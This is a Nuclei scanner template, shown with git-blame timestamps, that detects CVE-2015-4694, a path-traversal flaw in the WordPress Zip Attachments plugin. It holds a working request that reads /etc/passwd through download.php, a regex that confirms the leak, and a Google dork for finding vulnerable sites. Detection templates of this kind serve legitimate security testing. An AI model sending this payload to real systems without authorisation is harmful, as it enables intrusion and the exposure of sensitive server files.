2021-10-16 09:44:32 +00:00
|
|
|
id: CVE-2015-4694
|
|
|
|
|
|
|
|
info:
|
2022-05-13 20:26:43 +00:00
|
|
|
name: WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval
|
2021-10-16 09:44:32 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2022-05-13 20:26:43 +00:00
|
|
|
description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file.
|
2022-04-15 16:39:44 +00:00
|
|
|
reference:
|
|
|
|
- https://wordpress.org/plugins/zip-attachments/#developers
|
|
|
|
- https://wpscan.com/vulnerability/8047
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-4694
|
2022-05-17 09:18:12 +00:00
|
|
|
- http://www.vapid.dhs.org/advisory.php?v=126
|
2023-07-11 19:49:27 +00:00
|
|
|
- http://www.securityfocus.com/bid/75211
|
2021-10-17 11:26:16 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 8.6
|
2021-10-17 11:26:16 +00:00
|
|
|
cve-id: CVE-2015-4694
|
|
|
|
cwe-id: CWE-22
|
2023-07-11 19:49:27 +00:00
|
|
|
epss-score: 0.01382
|
|
|
|
cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:*
|
2022-07-11 17:26:09 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 1
|
2022-07-11 17:26:09 +00:00
|
|
|
google-query: inurl:"/wp-content/plugins/zip-attachments"
|
2023-07-11 19:49:27 +00:00
|
|
|
framework: wordpress
|
|
|
|
vendor: zip_attachments_project
|
|
|
|
product: zip_attachments
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: cve2015,wp-plugin,wpscan,lfi,wordpress,cve
|
2021-10-16 09:44:32 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-10-16 09:44:32 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|